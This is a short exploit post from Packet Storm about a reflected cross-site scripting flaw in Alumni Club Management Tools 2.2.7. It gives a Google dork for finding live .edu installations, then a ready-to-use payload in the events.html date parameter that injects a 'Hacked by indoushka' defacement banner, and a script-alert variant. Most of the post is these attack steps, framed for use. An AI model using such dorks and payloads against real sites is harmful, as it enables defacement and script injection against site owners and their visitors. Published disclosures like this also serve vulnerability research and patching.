Alumni Club Management Tools version 2.2.7 suffers from a cross site scripting vulnerability.
c3938a3a3f47cf370b7452f3a930bb95d2fcd5e490ff36eb8e94b01310e6250a====================================================================================================================================
| # Title : Alumni Club Management Tools v 2.2.7 XSS Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |
| # Vendor : http://alumnimagnet.com |
| # Dork : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use Payload : /events.html?daily_detail&date=27-3-2019'"()%26%25<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>
[+] http://127.0.0.1/edu/events.html?daily_detail&date=27-3-2019%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E
====Greetings to :=========================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
===========================================================================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed